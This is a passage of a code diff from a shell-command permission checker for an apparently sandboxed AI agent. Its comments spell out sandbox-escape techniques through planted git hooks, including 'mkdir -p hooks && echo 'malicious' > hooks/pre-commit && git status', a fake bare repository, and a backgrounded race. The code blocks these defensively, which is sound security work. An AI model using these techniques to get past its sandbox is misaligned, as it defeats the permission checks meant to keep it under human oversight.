+ message: 'Command is not read-only, requires further permission checks',
1720
+ };
1721
+ }
1722
+ // Check for Windows UNC paths in the original command before transformation
1723
+ // This must be done before splitCommand_DEPRECATED because splitCommand_DEPRECATED may transform backslashes
1724
+ if (containsVulnerableUncPath(command)) {
1725
+ return {
1726
+ behavior: 'ask',
1727
+ message: 'Command contains Windows UNC path that could be vulnerable to WebDAV attacks',
1728
+ };
1729
+ }
1730
+ // Check once if any subcommand is a git command (used for multiple security checks below)
1731
+ const hasGitCommand = commandHasAnyGit(command);
1732
+ // SECURITY: Block compound commands that have both cd AND git
1733
+ // This prevents sandbox escape via: cd /malicious/dir && git status
1734
+ // where the malicious directory contains fake git hooks that execute arbitrary code.
1735
+ if (compoundCommandHasCd && hasGitCommand) {
1736
+ return {
1737
+ behavior: 'passthrough',
1738
+ message: 'Compound commands with cd and git require permission checks for enhanced security',
1739
+ };
1740
+ }
1741
+ // SECURITY: Block git commands if the current directory looks like a bare/exploited git repo
1742
+ // This prevents sandbox escape when an attacker has:
1743
+ // 1. Deleted .git/HEAD to invalidate the normal git directory
1744
+ // 2. Created hooks/pre-commit or other git-internal files in the current directory
1745
+ // Git would then treat the cwd as the git directory and execute malicious hooks.
1746
+ if (hasGitCommand && isCurrentDirectoryBareGitRepo()) {
1747
+ return {
1748
+ behavior: 'passthrough',
1749
+ message: 'Git commands in directories with bare repository structure require permission checks for enhanced security',
1750
+ };
1751
+ }
1752
+ // SECURITY: Block compound commands that write to git-internal paths AND run git
1753
+ // This prevents sandbox escape where a command creates git-internal files
1754
+ // (HEAD, objects/, refs/, hooks/) and then runs git, which would execute
1755
+ // malicious hooks from the newly created files.
1756
+ // Example attack: mkdir -p hooks && echo 'malicious' > hooks/pre-commit && git status
1757
+ if (hasGitCommand && commandWritesToGitInternalPaths(command)) {
1758
+ return {
1759
+ behavior: 'passthrough',
1760
+ message: 'Compound commands that create git internal files and run git require permission checks for enhanced security',
1761
+ };
1762
+ }
1763
+ // SECURITY: Only auto-allow git commands as read-only if we're in the original cwd
1764
+ // (which is protected by sandbox denyWrite) or if sandbox is disabled (attack is moot).
1765
+ // Race condition: a sandboxed command can create bare repo files in a subdirectory,
1766
+ // and a backgrounded git command (e.g. sleep 10 && git status) would pass the
1767
+ // isCurrentDirectoryBareGitRepo() check at evaluation time before the files exist.
1768
+ if (hasGitCommand &&
1769
+ SandboxManager.isSandboxingEnabled() &&
1770
+ getCwd() !== getOriginalCwd()) {
1771
+ return {
1772
+ behavior: 'passthrough',
1773
+ message: 'Git commands outside the original working directory require permission checks when sandbox is enabled',
1774
+ };
1775
+ }
1776
+ // Check if all subcommands are read-only
1777
+ const allSubcommandsReadOnly = splitCommand_DEPRECATED(command).every(subcmd => {
1778
+ if (bashCommandIsSafe_DEPRECATED(subcmd).behavior !== 'passthrough') {
1779
+ return false;
1780
+ }
1781
+ return isCommandReadOnly(subcmd);
1782
+ });
1783
+ if (allSubcommandsReadOnly) {
1784
+ return {
1785
+ behavior: 'allow',
1786
+ updatedInput: input,
1787
+ };
1788
+ }
1789
+ // If not read-only, return passthrough to let other permission checks handle it
1790
+ return {
1791
+ behavior: 'passthrough',
1792
+ message: 'Command is not read-only, requires further permission checks',
1793
+ };
1794
+ }